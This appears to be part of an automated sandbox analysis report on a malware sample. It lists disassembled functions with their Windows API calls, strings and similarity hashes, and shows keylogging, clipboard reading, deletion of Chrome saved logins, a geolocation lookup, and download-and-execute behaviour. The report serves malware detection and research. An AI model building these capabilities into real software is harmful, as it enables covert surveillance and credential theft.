                            • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                            • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                            • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                          • Sleep.KERNEL32(00000BB8), ref: 0040E243
                          • ExitProcess.KERNEL32 ref: 0040E2B4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseExitOpenProcessQuerySleepValue
                          • String ID: 3.8.0 Pro$override$pth_unenc$!G
                          • API String ID: 2281282204-1386060931
                          • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                          • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                          • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                          • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                          Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                          • InternetCloseHandle.WININET(00000000), ref: 00419407
                          • InternetCloseHandle.WININET(00000000), ref: 0041940A
                          Strings
                          • http://geoplugin.net/json.gp, xrefs: 004193A2
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleOpen$FileRead
                          • String ID: http://geoplugin.net/json.gp
                          • API String ID: 3121278467-91888290
                          • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                          • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                          • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                          • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                          Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                          • GetLastError.KERNEL32 ref: 0040A999
                          Strings
                          • UserProfile, xrefs: 0040A95F
                          • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                          • [Chrome StoredLogins not found], xrefs: 0040A9B3
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteErrorFileLast
                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          • API String ID: 2018770650-1062637481
                          • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                          • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                          • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                          • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                          Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00408393
                            • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                          • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                            • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                            • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                            • Part of subcall function 00404E06: CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                          • FindClose.KERNEL32(00000000), ref: 004086F4
                            • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                            • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                          • String ID:
                          • API String ID: 1824512719-0
                          • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                          • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                          • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                          • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                          Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 0040949C
                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                          • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                          • GetKeyState.USER32(00000010), ref: 004094B8
                          • GetKeyboardState.USER32(?), ref: 004094C5
                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                          • String ID:
                          • API String ID: 3566172867-0
                          • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                          • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                          • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                          • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                          Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ManagerStart
                          • String ID:
                          • API String ID: 276877138-0
                          • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                          • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                          • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                          • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                          Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Find$CreateFirstNext
                          • String ID: H"G$`'G$`'G
                          • API String ID: 341183262-2774397156
                          • Opcode ID: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                          • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                          • Opcode Fuzzy Hash: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                          • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                          Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                          • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                          • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                          • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                          • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                          Function 0040A0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                          • wsprintfW.USER32 ref: 0040A13F
                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventLocalTimewsprintf
                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                          • API String ID: 1497725170-248792730
                          • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                          • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                          • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                          • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                          Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                          • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                          • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                          • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID: SETTINGS
                          • API String ID: 3473537107-594951305
                          • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                          • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                          • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                          • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                          Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 004087A5
                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstH_prologNext
                          • String ID:
                          • API String ID: 1157919129-0
                          • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                          • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                          • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                          • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                          Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                          • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                          • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                          • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                          • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                          • String ID:
                          • API String ID: 745075371-0
                          • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                          • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                          • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                          • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                          Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 0040784D
                          • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                          • String ID:
                          • API String ID: 1771804793-0
                          • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                          • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                          • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                          • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                          Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                          • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                            • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                            • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                          • String ID:
                          • API String ID: 1735047541-0
                          • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                          • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                          • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                          • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                          Function 00443700 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A%E$A%E
                          • API String ID: 0-137320553
                          • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                          • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                          • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                          • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                          Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                            • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                            • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                            • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateInfoParametersSystemValue
                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                          • API String ID: 4127273184-3576401099
                          • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                          • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                          • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                          • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                          Function 004063C6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222filenetworkCOMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: DownloadExecuteFileShell
                          • String ID: open
                          • API String ID: 2825088817-2758837156
                          • Opcode ID: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                          • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                          • Opcode Fuzzy Hash: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                          • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                          Function 0044F2A3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorInfoLastLocale$_free$_abort
                          • String ID:
                          • API String ID: 2829624132-0
                          • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                          • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                          • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                          • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                          Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004399A4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                          • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                          • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                          • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                          Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Context$AcquireRandomRelease
                          • String ID:
                          • API String ID: 1815803762-0
                          • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                          • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                          • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                          • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                          Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                          Download Yara Rule
                          APIs
                          • OpenClipboard.USER32(00000000), ref: 0040A65D
                          • GetClipboardData.USER32(0000000D), ref: 0040A669
